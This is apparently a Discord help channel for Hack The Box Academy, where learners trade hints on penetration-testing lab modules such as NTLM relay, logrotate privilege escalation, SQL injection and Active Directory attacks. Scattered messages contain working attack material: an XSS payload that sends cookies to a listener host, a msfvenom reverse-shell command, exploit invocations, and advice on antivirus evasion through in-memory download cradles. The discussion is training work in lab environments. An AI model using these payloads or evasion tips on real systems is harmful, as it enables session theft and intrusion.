#modules

1 messages · Page 125 of 1

sly kelp
#

I did 13 today

undone narwhal
#

which host are you in now?

pulsar needle
#

As administrator

vital adder
#

hint dump the ||hash|| (also hint it's not ||sam||)

undone narwhal
# pulsar needle SQL

my apologies i thought you were doing 3rd question since you mentioned responder and you dont need responder for the 8th question at all use the above hint

pulsar needle
#

Or I got this when using LaZagne ||[-] Administrator not ok for masterkey f2235d17-8d2f-4b0a-946f-ae79226da87c|| but that told me nothing lmao

vital adder
undone narwhal
pulsar needle
#

you cant to pth

vital adder
#

if you have the cred try to do some password spraying

undone narwhal
pulsar needle
#

no, lol

undone narwhal
#

there is another method ||evil|| method

pulsar needle
#

OMAh

#

Stupid evil

#

I always forget it exists

trail leaf
#

always ask yourself if there's a way around something before giving up on the route 😉

runic rampart
#

Good evening!
NTLM Relay Attacks:NTLM Cross-protocol Relay Attacks
Use impacket's SOCKS server to hold NPORT's relayed connections and abuse them to access the MSSQL service at 172.16.117.60; query the 'flag' table within the 'development01' database and submit the flag.
Ktonibul was able to implement the attack?
Gives an error message
[-] Connection against target mssql://172.16.117.60 FAILED: [('SSL routines', '', 'no protocols available')]

pulsar needle
#

YOURE joking

#

I found that hash yesterday, like for Admin, but I couldnt RDP

#

So I was like, there is another way i guess

#

5 hours looking for that other way, already having the answer

#

gg

rain briar
#

anyone else getting caught up in some of the examples they provide

#

how can you go through them if you dont have access to the victims machine yet

opal storm
#

Hello, I am trying to do the splunk for windows attacks but i am a little confused on how to connect to the instance to run the splunk queries for the questions?

kind turret
#

Become the admin user then run ntlmrelayx

full drum
#

Hi all, i'm trying to do Linux Priv Esc -> Log Rotate page. I have LogRotten compiled and running on the attack box. I've also identified which log to attack, however no file is created in the /etc/bash_completion.d folder when running the exploit. Any help here would be appreciated.

Edited: Added details.

oak sequoia
#

hi does anyone know why this dont work?

sly tapir
#

has anyone completed the Malware Analysis Module "Code Analysis", I need a hint on the first question; I see where its calling sub_####8, and calling the RegOpenKeyExA , but cant find what key it is

undone narwhal
#

and also the exploit should be run in the victim machine not on the attack box

full drum
runic rampart
pulsar needle
#

Finally 😄

full drum
# undone narwhal and also the exploit should be run in the victim machine not on the attack box

So i've tried:

  • moving the exploit command the background and running a forloop to echo into the logfile
  • multiple tabs switching quickly and pressing enter in each
  • restarting the box
  • running a forloop in a separate shell tab
  • modifying the payload to be simpler, just catting the flag file and writing it to htb-student folder.

Still can't get a "Done" response. Can i DM you to see if i'm running the right commands?

twin canyon
trail leaf
#

It makes way more sense once you see someone do it

full drum
full drum
#

So it looks like all I was doing wrong was the order of commands. I should have written to the file BEFORE executing the exploit.

#

that 4 hours of my life i'm not getting back.

trail leaf
#

I don't think that's the issue, the exploit just needs to be running when it rotates, so I think writing before executing might have given more consistent timing

full drum
#

Nope. I literally just changed the order of my 1 liner for writing and executing the exploit and it worked.

#

first time

trail leaf
#

if it works it works 🤷‍♂️

full drum
#

same as the write up

trail leaf
full drum
#

thanks for the nod in the right direction. I'll be honest though, stuff like this doesn't feel like a learning experience.

foggy light
#

Module: Intro to Assembly Language
Section: Skill Assessment

Can I dm someone my loaded_shellcode and flag optimized. I feel like I have coded the right thing But im missing something

regal ember
#

#cybermonday

leaden pond
#

Does anyone have any good resources they recommend to supplement the material in the Pivoting, Tunneling, and Port Forwarding module? I'm having trouble grasping the concepts from this module.

pulsar needle
#

Well the AD module xd

leaden pond
#

Oh nice, does that module go over the concepts from Pivoting, Tunneling, and Port Forwarding in more detail? Would it make sense to try and tackle the AD module first and then come back to Pivoting, Tunneling, and Port Forwarding?

tight mesa
#

Hi y'all, I'm stuck in the Attacking SQL Databases section under Attacking Common Services module...

#

I could log in and grab the Databases but, when I'm trying to connect with the database I guess is the target database I got a message about the User is not able to access the target database

#

reading the forum I found a hint regarding a hash which really I'm not understanding correctly

#

do I have to connect thru the MSSQL with the hash as PTH or do I've to crack the hash?

pulsar needle
tight mesa
#

I tried the 'IMPERSONATE' identification process and not worked for me either

tranquil axle
quartz blaze
#

I need help bombarding a server

sly tapir
signal raptor
#

Can someone tell me what network mode should I put a vulnerable test machine on VMware Workstation?

signal raptor
#

I don't want the vulnerable machine to access my home network or cause problems for my physical machine

lusty thicket
#

but if you want it to be realistic you should go for bridged network mode

lusty thicket
trail leaf
#

"realistic" is an interesting adjective here, because what network mode you use is dependent on how you want all of the VMs to connect to each other

coarse bay
#

Hey there, I'm a bit new to the discord and the academy but I seem to be a bit stuck in the linux fundamentals at the filter contents section if there's a better place to ask the questions please let me know, but I can't seem to figure out how to answer the questions at the bottom, and it seems like it wasn't covered in the module

#

I'm trying real hard to avoid just looking answers up, as I'm actually trying to learn!

#

Here's this also if it helps

lusty thicket
coarse bay
#

I'm not sure how to see 'listening services' on linux

lusty thicket
#

you already have the ||ssh|| credentials

coarse bay
#

Right, let me ssh back into the box rq

lusty thicket
coarse bay
#

also, while I'm at it, to connect with my vm to the target, I've been downloading the vpn file and then using cp to copy the file to another directory I made with mkdir called HTB/ovpn/ and then sudo openvpn (.ovpn file)

#

is there an easier way to do that?

#

or am I doing that the right way

#

and that's necessary to ssh in right?

lusty thicket
coarse bay
coarse bay
#

without grep it outputs 118

lusty thicket
#

which means you should exclude that address

coarse bay
# lusty thicket which means you should exclude that address

I'm sorry, still a bit confused, I just tried || netstat -l | grep -v 127.0.0.1 | wc -l || which returned 118, after that I tried that I used || netstat -l | grep 10.129.120.7 | wc -l || which returned 1 and the answer still seems to be incorrect. I've checked netstat and didn't see much info about excluding certian addresses so I tried it through grep, also, I just tried ss and it seems like it's a bit easier to exclude certain types of values but I'm really lost there too, I tried || ss -l -4 || and it showed a list of tdp/ucp connections but the amount didn't check the question off either edit: netstat was 2x

lusty thicket
lusty thicket
coarse bay
#

or is that still wrong :3

lusty thicket
#

you don’t need to use the -l option when using -a

coarse bay
#

Oh okay, they did return the same word

#

The only problem is that it's still saying it's wrong

lusty thicket
#

||grep LISTEN||

coarse bay
#

OH SHIT

lusty thicket
#

don’t forget that

coarse bay
#

damn

#

|| htb-student@nixfund:~$ netstat -a -n | grep -v 127.0.0.1 | grep LISTEN | wc -l ||
104

#

I've still got a big oof, it's still wrong

lusty thicket
#

you don’t need the wc -l

#

i feel like the answer is staring at you

coarse bay
#

I dunno man I don't think so

#

I'm dyin here

#

I only had the wc -l to count em but, it still didn't return the right amount either way

#

do you want to see the output?

lusty thicket
#

i think this should work ||netstat -an | grep -v 127.0.0.1 | grep -w LISTEN | wc -l||

#

@coarse bay

coarse bay
#

I'm lost

#

I feel like that should've worked

lusty thicket
coarse bay
#

I just refreshed it must've bugged

#

lemme retry it

#

lmao

lusty thicket
#

delete this

coarse bay
#

oh thanks

coarse bay
lusty thicket
coarse bay
#

wait

#

okay nvm

coarse bay
#

it returned 0 btw

#

I think we were on the right track though, but the answer I found was this || ss -l -4 | grep -v "127.0.0" | grep "LISTEN" | wc -l ||

coarse bay
#

it doesn't show it but there are \ before the .0's

coarse bay
lusty thicket
#

for all users

coarse bay
#

okay, I tried || jobs || but it didn't seem to return anything

#

I tried || jobs --h and also man jobs ||

#

still nuthin

lusty thicket
coarse bay
#

OOPS

#

Okay

#

Prolly doin this wrong again but hey! || I've tried ps -e to show all the processes, and I can't find a ProFTP and then I realized it needed it under a certain user, so I did -u to show users, but it only shows htb-student||

#

also sometimes it doesn't let me type anything in the console and I have to re-ssh in, did I do somethin wrong

lusty thicket
coarse bay
coarse bay
#

I found proftpd with a grep like this || ps a -e | grep "ProFTPd" ||

#

but the user isn't shown

#

oh waity

#

okay nvm

coarse bay
lusty thicket
coarse bay
#

that gave an error about syntax

#

error: list of users must follow -u

Usage:
ps [options]

Try 'ps --help <simple|list|output|threads|misc|all>'
or 'ps --help <s|l|o|t|m|a>'
for additional help text.

For more details see ps(1).

lusty thicket
#

try ||ps -aux | grep ||

coarse bay
#

wait what's the x

#

|| htb-stu+ 6505 0.0 0.0 13144 1076 pts/1 S+ 23:16 0:00 grep --color=auto ProFTPd||

lusty thicket
coarse bay
#

ah okay

#

Just to put it out there, I tried putting in the basic username of htb-student and it didn't work

#

from the last output

coarse bay
#

It wants the username, I just tried the abv. sersion htb-stu+ but it didn't like that output

#

Okay I tried something for shits and giggles, and I'm more confused now

#

I tried putting in || ProFTPd || just to see if it'd work

#

and it completed it

#

but I'm left more confused now because the question is asking for the user that process is running under

lusty thicket
coarse bay
#

so technically shouldn't it be htb-student?

coarse bay
lusty thicket
#

just read the proftp configuration file in etc to see the username😭🙏

proud pine
proud pine
tight mesa
#

anyone who has done Attacking common services - SQL Databases....!!!!

tight mesa
#

I am not being able to enumerate the database

trail leaf
#

All of the commands you need for that section are in the text, it's a matter of recognizing what kind of SQL you're working with

tight mesa
#

can DM to you?, cuz the command applied are not working

#

identify the SQL is self emplained in the password

#

with not being able to enumerate the database I mean use the database, I could crack the password from the hash but I'm not able to log in with that user|password

trail leaf
#

You can DM, but I might not reply for a while

#

heading somewhere

tight mesa
#

anyone has an idea why this message error

||sqsh-2.5.16.1 Copyright (C) 1995-2001 Scott C. Gray
Portions Copyright (C) 2004-2014 Michael Peppler and Martin Wesdorp
This is free software with ABSOLUTELY NO WARRANTY
For more information type '\warranty'
Msg 18452, Level 14, State 1
Server 'WIN-02\SQLEXPRESS', Line 1
Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
Open Client Message
Layer 0, Origin 0, Severity 78, Number 34
Adaptive Server connection failed
Open Client Message
Layer 0, Origin 0, Severity 78, Number 34
Adaptive Server connection failed||

final maple
#

You are supposed to add the two bitmaps. So, 512 + 128 = (ANSWER)

tight mesa
#

who has done attacking common services | attacking SQL databases, could please let me know if this command worked for you ||sqsh -S 10.129.203.12 -U \WIN-02\mssqlsrv -P 'pxyz...1' -h ||

proud pine
#

<@&861185840277487616> pika_sip

novel matrix
#

o.O

supple patio
#

Nice cat

rustic sage
#

(^o^)/

tulip dragon
#

trying to import powersploit in the target machine by ssh

#

i was able to do it in my local windows vm but its giving me error in the machine , dont know whats wrong

coarse void
#

blocked by AV

tulip dragon
#

what can i do now to solve it then

slate gate
#

obfuscate it or disable av i guess

final maple
#

Use a download cradle that executes it from the memory...look in the file transfer module for a powershell command that starts with "IEX"

tulip dragon
split parcel
#

Module: Linux Local Privilege Escalation - Skills Assessment
i'm trying the optional way. I have a reverse shell already. What should i do to escalate the shell?
Saw a DB and inside only got 1 user which is already used to login into W*
anyone can drop any hints?

warm drift
#

In ICMP section of Pivoting module I get error when trying to start ptunnel server on pivot host the error is

./ptunnel-ng: /lib/x86_64-linux-gnu/libc.so.6: version GLIBC_2.36' not found (required by ./ptunnel-ng) ./ptunnel-ng: /lib/x86_64-linux-gnu/libc.so.6: version GLIBC_2.34' not found (required by ./ptunnel-ng)

https://academy.hackthebox.com/module/158/section/1438

wooden kettle
#

i was trying the nmap medium lab for firewall evasion. To find the dns server version, i used the nmap -sSU -p 53 --script dns-nsid <target ip> but still its not showing the version. Did anyone face it

remote warren
#

Hi everyone. Module : "Attacking Web Applications with FFUF" i'm at the "skill assessment part1. It asks for the page that says 'you don't have access' ; i'm using FFUF but just to understand if i'm doing something wrong ; ffuf returns me with `________________________________________________

.php [Status: 403, Size: 287, Words: 20, Lines: 10, Duration: 16ms]
index.php [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 16ms]
[Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 17ms]
[Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 15ms]
.php [Status: 403, Size: 287, Words: 20, Lines: 10, Duration: 15ms]
:: Progress: [175302/175302] :: Job [1/1] :: 2589 req/sec :: Duration: [0:01:14] :: Errors: 0 ::
` but i don't understand why it shows 'status 200' pages but no names, nothing.
any hints or suggestions or whatever would be much appreciated. few days i'm on this and can't figure out what's going on.

remote warren
#

nevermind... i'm just dumb i guess 😄 Found the reason 😄

twilit wharf
#

Module "Active Directory Enumeration & Attacks" -> "Skills Assessment Part I"
After I kerberoast and crack the hash for a service-user password, bloodhound hints me towards a host where I have sqladmin rights, but the hostname ist not known by the DC. Also the next questions asks about MS01, which does not seem to have any connection to the service account I got. What am I missing here?
Edit: Nevermind. Bloodhound seemed to miss something

frozen mesa
#

SQL INJECTION FUNDAMENTALS --> Writing Files --> Find the flag by using a webshell.

Someone can give me a start? I cannot figure out how to solve this one.

rustic sage
#

HI

#

is the machine for free

#

how can i launched

#

it

#

i am totally beginner

vital adder
vital adder
vital adder
vital adder
vital adder
fringe shell
#

In Attacking Common Applications - Assessment I, I ended up getting the flag in a round about way, but the question says to obtain a shell... anyone got a hint on how I could do this?

split parcel
# vital adder which question are you on?

i have completed all 5 flags.

But i wanted to try the optional way without using the SSH credentials.

I got a reverse shell through ||WP||, but am unsure of how to proceed from there

tulip dragon
frozen mesa
covert grail
#

hey guys I stuck in Union Clause from SQL Injection module every command with UNION i write it say its wrong

#

i need help 🙂

analog dock
#

What have you tried

covert grail
# analog dock What have you tried

||```MariaDB [employees]> SHOW TABLES;
+----------------------+
| Tables_in_employees |
+----------------------+
| current_dept_emp |
| departments |
| dept_emp |
| dept_emp_latest_date |
| dept_manager |
| employees |
| salaries |
| titles |
+----------------------+
8 rows in set (0.093 sec)

MariaDB [employees]> SELECT * FROM employees UNION SELECT * FROM departments;
ERROR 1222 (21000): The used SELECT statements have a different number of columns

shut wraith
#

Can anyone help me with this question

SQLMAP ESSENTIALS

Attack Tuning

What's the contents of table flag7? (Case #7)

sqlmap http://IP:PORT/case7.php?id=1 --union-cols=5

That's my command but it doesn't work. Can I get any help please

sly tapir
#

jezz...that debugging section in malware analysis module was a beast

#

instructions were sort of hard to follow---took me a couple of times

vital adder
vital adder
#

pls ask your questions here first before ping a bunch of people

vital adder
#

with that being said there is some unintended ||vuln|| that can give you root instantly

tulip dragon
#

bruh these thm mods

#

I just asked them how to install Powersploit through Powershell and they asked too many questions like where it is, and what u doing in the end, they said We can help you.

fresh pine
#

I've been stuck for a while in LOGROTEN in Linux Privilege Escalation, problably i'm doing something stupid but I can't get it through, can you tell what i'm doing wrong?:

COMMANDS:
TARGET: ./logrotten -p ./payload ../backups/access.log.1

which gets this when modifiyng file...

Waiting for rotating ../backups/access.log.1... Renamed ../backups with ../backups2 and created symlink to /etc/bash_completion.d Waiting 1 seconds before writing payload...

ATTACKER: nc -nlvp 9001 listening on [any] 9001 ...

blissful elm
#

which path to follow

#

or this

acoustic owl
covert grail
vital adder
analog dock
#

In this case employees has 6 columns and departments only has 2

#

In the section it shows what to do to “fill up” those columns it doesn’t have

analog dock
#

In the section…

covert grail
analog dock
#

1,2,3,4…..

sinful nova
#

Hi

naive wadi
#

looking for a hint with this? "What is the ObjectAceType of the first right that the forend user has over the GPO Management group? (two words in the format Word-Word) " in ACL Abuse in Active Directory Module

#

I'm in bloodhound looking at the actual rights and the answer of ||Generic-Write, GenericWrite, Add-Self, AddSelf|| is not working unsure of what I am doing wrong

#

or does this want me to provide the non-human readable GUID as an answer?

naive wadi
#

I've tried the filtering part, unsure what I am doing wrong

languid juniper
#

Hello, wondering if someone can help me with that Antak module

#

on the first question "Where is the Antak webshell located on Pwnbox? Submit the full path. (Format:/path/to/antakwebshell)"

#

On the Windows box it is " C:\inetpub\wwwroot\status.inlanefreight.local\files\Upload.aspx"

#

Holy explitive

#

Its /usr/share/nishang/Antak-WebShell/antak.aspx

#

Talking to myself on this helps me solve the module myself, thank you!

fickle fiber
#

can I get some help with the logrotate exercise for linux priv esc?
I'm running logrotten, and I'm appending to /home/htb-student/backup/access.log
my payload is supposed to pop a reverse shell back to me, log rotten executes successfully but I don't get the shell back, what could I be doing wrong?

covert grail
#

if I want to start bug bounty wich modules i should complite first ?

covert grail
fickle fiber
#

you are on the right track then 🙂

covert grail
#

but i mean i should complete all of them to be abale find my first bug

#

or i can be more specific and earn the next month payment

#

?

thorn urchin
#

Expecting to get money from bug bounty while youre new is optimistic

covert grail
#

how it works then ?

#

so its not possible to found the old bug ?

#

like in the hacker1

rustic sage
# covert grail how it works then ?

i think madf0x means that it’s hard to find bugs, especially as someone new with little to no experience. There is also a lot of competition for the big companies with big payouts on hackerone, and as someone new it might seem impossible. Not to mention not all companies on hackerone (and other platforms) offer a bounty.

thorn urchin
#

competition for pub bounties are pretty massive

rustic sage
#

^^

thorn urchin
#

if you're gunna go bug bounty hunting be pleasantly surprised if you even find anything, more surprised if they actually accept it and even more surprised if they actually pay out for it

rustic sage
#

i can’t speak for the CBBH path and exam, but i’d start there and then maybe do the web based challenges and content on the main HTB platform

thorn urchin
#

A lot of successful bug bounty hunters are either A. Incredibly skilled B. Got connections for Private bounties C. grinded out a lot of freebie bugs over time till they started getting invites to private bounties or D. Combination of the above.

sly kelp
zinc marsh
#

First come first served

tight mesa
#

hello y'all, who can give me a hint with the last question of attacking rdp section under attacking common services module?

#

I'm being not able to find any information|reference about administrator to grab their hash

#

I tried with responder, but I just could find the regular user shared in the exercise

#

the target machine is running Win2019 and the RDP Session Hijacking explanation according the material, this method NOT longer work in W2019

fathom pendant
#

Low effort troll

rustic sage
#

Can I DM someone about Attacking DNS in Attacking Common Services?

covert grail
tight mesa
rustic sage
tight mesa
quasi wave
#

is it possible to get CBBH certification in one year or less and know the material really well?

thorn urchin
#

yes

#

everything is relatively but especially learning speeds

west canopy
#

This I believe leads to true learning, and it's difficult to give a time estimate for.

rustic sage
#

Guys, I am in windows attacks and defense, trying to open this machine but it is not working

digital pewter
#

Has anyone else been having trouble starting Pwnbox instances, even with a paid account? Happened while demoing the academy to try to get some grant money to buy subscriptions for the students. 😢

rustic sage
#

Is there any issues with a website?

quasi wave
#

if I'm not gonna do the CREST certification because I'm in the US, is it still worth it to do CREST skill paths in order to gain more advanced skills in the future?

rustic sage
#

I hope they can fix it soon

quasi wave
#

how worth it are CREST modules without the cert?

sly tapir
#

finally finished that malware analysis module--fun stuff

quasi wave
trail leaf
#

The CREST modules are just taking existing modules in the academy and putting them in a path, with possibly a few made specifically with CREST in mind

#

CPTS and CBBH is all in that path iirc but not 100% sure on that

digital pewter
trail leaf
quasi wave
#

or if CREST does become valuable in US to get certified

#

because it looks like a better cert than OSCP

#

could make employers take me very seriously

trail leaf
#

Follow whatever path you want based on what skills you want to develop 🤷‍♂️

thorn urchin
#

honestly man it feels like you spend too much time minmaxing what you should focus on learning instead of just going out and learning it

quasi wave
#

right but I'm wondering if CREST path actually gets you advanced enough skills to get CREST or if it at least gets you enough skills to do advanced HTB boxes

#

ok ya I do overthink stuff

trail leaf
#

Just learn.

quasi wave
#

ok

trail leaf
#

Once you do some basic learning, you will find what areas you want to improve on

thorn urchin
#

I mean some overthinking is good but at the end of the day its not gunna teach you how to do LFI until you start just learning LFI ya know

trail leaf
#

But you need to take that first step before trying to min max

quasi wave
#

ok got it thank you good idea

#

I spent some time on Nmap module today

#

working through CBBH and CPTS

#

lmao gonna finish CBBH first so I can bug hunt and have income sooner lmao

#

but CPTS is also fun

#

but gotta work on Nmap first

#

I think Nmap is valuable for bug hunting so doing this one module and some main platform boxes

trail leaf
quasi wave
#

I know but like its resume experience

#

and small extra income

trail leaf
#

Just wanted to make sure before you get extremely frustrated when you start trying 😅

quasi wave
#

I know thank you for your concern

thorn urchin
#

its not even small, youre really not going to get an income whatsoever doing bug bounties

quasi wave
#

ok got it point taken

thorn urchin
#

it takes a lot of factors to make money from bug bounties and skill is only one part of it

round gale
#

in the Laudanum, One Webshell to Rule Them All section, the module mentions that the webshell gets uploaded to (double backslash slash before "files")\files\ directory. but when we upload the webshell , it says that the webshell is uploaded to C:\inetpub\wwwroot\status.inlanefreight.local\files\shell.aspx. so why does the course material state that its uploaded to (double backslash before "files" )\files\ ?

frank breach
#

hello, everyone know what the differences of using -windows-auth and without using this option?

vocal tusk
#

hi guys im doing the shells and payloads (the live engagement) im strugling to make a war file somehow my kali dosent have jar command anyone able to give a hand please and thanks

sacred verge
#

Has anyone been working on blockchain challenges ? I have a quick question

short hare
#

ATTACKING COMMON SERVICES: Attacking SQL Databases
Question: What is the password for the "mssqlsvc" user?

Logged in with : mssqlclient.py -p 1433 htbdbuser@<ip>
Checked tables of the master, tempdb, msdb databases but found nothing regarding this.

Where am i supposed to find the user and password tables in this?

fallen herald
#

+1

vital adder
vital adder
vital adder
vocal tusk
echo roost
#

I have rebooted my vm, reverted that vm, and did wall the usual troubleshooting.

#

If I use remmina it works

#

here is the command I used - xfreerdp /v:10.129.27.59 /u:htb-student /p:Academy_student_AD! +clipboard /cert:ignore

trail leaf
#

Press enter, VM is in an energy saving mode or something

echo roost
#

wait, lol it worked, Oh I wish I could just delete everything I just posted

trail leaf
#

Yep

echo roost
fathom pendant
#

That's what makes it funny

echo roost
#

true that

#

I'll keep em there lol

#

Need more coffee I guess.

fathom pendant
#

But tbh you're not the first, and probably not last, person that's run into that

echo roost
#

Yeah, I thought I hit enter, I probably did but without that screen in the foreground.kek

twilit gull
#

Hey guys, I got struck in the skills assessment. Could you help me.
when I'm using that cookie I'm unable to login as admin.
||auth-session=s:qPppmnahd3mYZhS3ihr6GzND0F_61XgV.8TrV0JwCrXeURX4J588m3AOzzH4RQ76PHS0RCbscSH4||
I obtained it by using payload:
||<style>@keyframes x{}</style><video style="animation-name:x" onanimationend="window.location = 'http://10.10.15.59:8000/log.php?c=' + document.cookie;"></video>||

mossy hatch
#

hi can i use the vpn of htb academy in htb boxes or is it two differents conf?

fathom pendant
#

Two different services

mossy hatch
twilit gull
fathom pendant
twilit gull
#

The module is skills Assessment in session security

fathom pendant
#

Yeah I haven't done this one

raven locust
#

doing the password attacks module atm but damn shit is slow

fathom pendant
#

Yep that's mostly intentional

#

Setting hydra threads to 48 tends to be the most stable

fathom pendant
raven locust
#

oh, good to know

#

ill get on that after this one, im currently trying to get the sam user but ive resigned to just waiting a little longer

fathom pendant
raven locust
#

imagine if we had to bruteforce the username sam as well

fathom pendant
languid juniper
#

Good morning

#

I am on "The Live Engagement" module

#

and am trying to simply open a web browser on the Foothold machine

#

to open up the webpage on status.inlanefreight.local

#

Is there a command that I need to run, I dont see firefox or any browser that I can use

#

I tried the command xdg-open but that just opens Pluma

#

Can anyone help me?

raven locust
#

just took ages

#

but ive got it now 👍

fathom pendant
#

That's good :) I hope you weren't bruteforcing ssh and did the other available service

languid juniper
#

Can anyone point me in the correct direction, I am asking chatgpt with no good answer other than the xdg-open command which only gives me text

languid juniper
#

holy

#

Thank you

fathom pendant
#

This question has been asked a bunch of times here

languid juniper
#

Well, we appreciate it

raven locust
#

you can also use burp’s browser, that’s what i ended up doing

viral ridge
#

anyone i can dm to discuss about an error ?

acoustic owl
#

What is it about?
Just ask here

novel shoal
high reef
vocal tusk
#

Hi Guys still at the hells and payload second host . i got as far as giving it the payload with metasploit but i get a invalid json response and it exits after it and never runs shell

vital adder
fathom pendant
novel shoal
vital adder
novel shoal
#

thank you very much bro

pearl torrent
#

Can someone give me a nudge on Windows privilege escalation: credential hunting? I've got several files containing passwords, and none seem to be the right answer. Not sure what I am missing here.

analog dock
languid juniper
#

Hello - I am stuck on "The Live Engagement" specifically 'Exploit the target and gain a shell session. Submit the name of the folder located in C:\Shares\ (Format: all lower case)'

#

I have run the following msfvenom command to create the war payload and uploaded it - the IP address I see of the Foothold ia 172.16.1.5

#

msfvenom -p java/jsp_shell_reverse_tcp LHOST="172.16.1.5" LPORT=4343 -f war > reverse.war

#

I am able to uploade the reverse.war and deploy it then run a listener on the Foothold (sudo nc -lvnp 4343) but do not get a connection

narrow solar
#

good day friends, i am at Attacking Common Applications Attacking Splunk, i think in inputs.conf i have to change rev.py to .ps1 , so i did but i still cant get a rev shell

languid juniper
#

am I correct so far here any advice on what direction I should be looking in is super appreciated

narrow solar
vagrant orbit
#

Is anyone able to help me with a question from the Pass the Hash module in Password Attacks? I have David's hash but when I connect to the share, I don't have permissions to go into the "david" folder.

#

Thanks in advance ^

silver mesa
#

try Pass the Hash from Windows Using Mimikatz.

vagrant orbit
#

I am RDP'd in as david

opal hull
#

man, Exploiting Web Vulnerabilities in Thick-Client Applications is breaking me!!!

vagrant orbit
#

Tried that, still getting access denied

silver mesa
#

Have you solved ques 1 and 2 ?

vagrant orbit
#

yes

#

I feel like I have done everything right, I am logged in as david

silver mesa
#

dm me

vagrant orbit
#

ok, thanks 🙂

rotund swallow
#

Hi, are there special chat tab that I am allowed to get some advise or someone can PM me an we can address somethings

#

any compassion can do all I want is your support my soul is lost I need direct answers

vital adder
rotund swallow
#

I did

#

long time ago Im exhausted by everything

#

I dont want more bureaucracy, but it said "to mention in chat if you want someone's help, you are not allowed to PM directly"

#

that's the only rule I remember

vital adder
vital adder
rotund swallow
#

huh????

vital adder
#

no idea if you have mental or technical issue lol

rotund swallow
#

nevermind

#

yeah funny

#

right?

#

I hope you end up on the list on the darkweb

spare cypress
#

Hi guys!

thorn urchin
vital adder
#

this channel is HTB academy modules if you guys want to chat take it to #general

vital adder
vital adder
echo roost
#

it will not accept either answer

thorn urchin
#

bloodhound isnt gunna be useful here

echo roost
#

ty

#

powershell isn't doing anything - I have the SID converted but it won't budge

#

No error either

#

keep waiting based on this - Note that this command will take a while to run, especially in a large environment. It may take 1-2 minutes to get a result in our lab. ?

tall tide
#

I just did this one. You just need to be patient.

pearl flint
#

where can i get lazagne standalone for linux

#

the one from the repo needs requirements to be installed and i cant do that beacuse i dont have internet on the target

thorn urchin
#

from google

#

or compile yourself

#

which module

echo roost
echo roost
tender lake
tall tide
echo roost
echo roost
#

||Get-DomainObjectAcl -ResolveGUIDs -Identity "CN=GPO Management,OU=Security Groups,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL" | where {$_.SecurityIdentifier -eq $sid} -Verbose||

spare cypress
#

Hey guys, is there any module that teaches how to setup a linux distro? Sorry, am new 😦

sly kelp
#

Or just Youtube if you like to learn that way

spare cypress
#

Thank you so much! I just started my training and was wondering where was this taught

twilit cipher
#

Don't know if there is a "suggestion" box outside of this channel, but I would like to suggest adding a ligolo-ng section into the "Tunneling and Pivoting" module... To whom should I direct such a suggestion?

proud pine
twilit cipher
#

🤔 Good "suggestion."

proud pine
#

For the pivoting module,

Co-Authors: TreyCraf7, LTNB0B```
twilit cipher
#

Yep, found it...

#

@mellow whale How difficult would the above suggestion be? (Assuming this is you...) Couldn't find that Chetan-8.

warm drift
tight mesa
#

hey @warm drift what's up, what kind of help are you needing?

tight mesa
#

yup

#

shoot

rustic sage
#

hey, I was wondering if I can create a module in HTB Academy and what are the terms and conditions?

echo roost
#

Maybe use 'UserPrincipalName' as the identity?

verbal kraken
#

why doesnt the options method show me the allowed headers?

twilit cipher
#

🙂

mossy hatch
#

hey do someone know a linux command to url encode a string?

quaint gate
#

Module 134 aka Web Attacks, under the section of Advanced Exfiltration with CDATA, the example given to read the file contents of submitDetails.php. Does this example given work in the lab system given for that section. I have the flag already, however I can't get the example to work as it was given. Multiple people have had this issue in this forum, I have yet to locate what I screwed up. Any suggestions would be greatly appreciated.

tight mesa
#

any one have an idea what could be wrong here?

undone narwhal
quaint gate
tight mesa
#

anyone can give a hint how to use telnet with username and password?

fresh pine
#

Windows Privilege Escalation Skills Assessment - Part I

I can´t use wget, Invoke-web, certutils... to get the nc.exe to the machine and execute a reverse shell

Please, any help, ideas... 🙏

royal sigil
#

helloo i make the skill asesement of the file inclusion module i have find the file flag but i cant find the root path i have tried a lot

fringe shell
fringe shell
fresh pine
undone narwhal
royal sigil
fringe shell
royal sigil
#

i have trie with ffuf it give me this but dont work /var/ww/html

fringe shell
#

oh the webroot?

royal sigil
#

yeah

fresh pine
fringe shell
fringe shell
# royal sigil now i have this

yeah thats the way... so if you're using ||log poisoning|| for command execution, you should just be able to do cat flag

undone narwhal
royal sigil
fringe shell
fresh pine
#

No success @fringe shell @undone narwhal 😭

candid gale
#

Hey guys, how are you doing? Im having problems with the final assessment from stack based bof on windows.
I already got the right buffer size, the jmp esp address and the bad char.
Somehow my exploit seems to do it well (looking on the debugger, setting a breakpoint on the JMP ESP and stepping into it looks good).
Buy I'm not getting the reverse shell on my local PC.
Someone can help me? Thank you in advance.
Exploit + details:

fringe shell
#

i think i always did... if it wasn't already stashed on there in a "Tools" folder or something. Haven't used the load kiwi function, so can't help there.

iron hazel
#

ty

honest ridge
#

can anyone help me on attacking common application :section IIS tilde enu part?

fringe shell
#

you can run the "Generate Wordlist" part and then "Gobuster enumeration" pretty much verbatim and it should work

honest ridge
#

ya, and i did and gave 1 output being the obvious answer and isnt accepting as correct.

#

@fringe shell can i dm you?

fringe shell
winged sonnet
#

hi

tawdry vapor
#

anyone can help me with Password Attacks Lab - Hard in the password attack module? I'm stuck a few hours with brute force with Johanna user

coarse void
#

which list are you using

tawdry vapor
#

i'm trying with password.list and mut_password.list

coarse void
#

i think ur on the right track

#

but for the username have you tried lowercase

tawdry vapor
tawdry vapor
coarse void
#

yah

coarse void
iron hazel
#

Hi friends. In this crack protected files section: https://academy.hackthebox.com/module/147/section/1322 The question asks me to log in with Kira's cracked password...are we suppose to hydra the initial access to the host? The section is about cracking protected file Idk where kira comes from.

coarse void
iron hazel
#

thank you

coarse void
warm drift
#

please I think my DNS settings are messed up and I heard Resolv.conf is prioritized over hosts file and bcuz of this I can't do any labs with dns involved my kali version is 2023.3 this is what's in my resolv.confresolv.conf contains

Generated by NetworkManager

search localdomain
nameserver 1.1.1.1

acoustic owl
#

What exactly is not working?
What do you mean by labs with DNS involved?

There is nothing unusual in your /etc/resolv.conf.

narrow solar
warm drift
warm drift
warm drift
coarse void
#

inlanefreight htb isn't a public domain

#

you have to use the dns server provided in the section

warm drift
#

i added it in my etc hosts

acoustic owl
latent sage
acoustic owl
coarse void
#

nslookup resolves the domain name from dns servers not from /etc/hosts

warm drift
acoustic owl
#

TLD = htb, right?

warm drift
acoustic owl
#

This difference is extremely important 😉

#

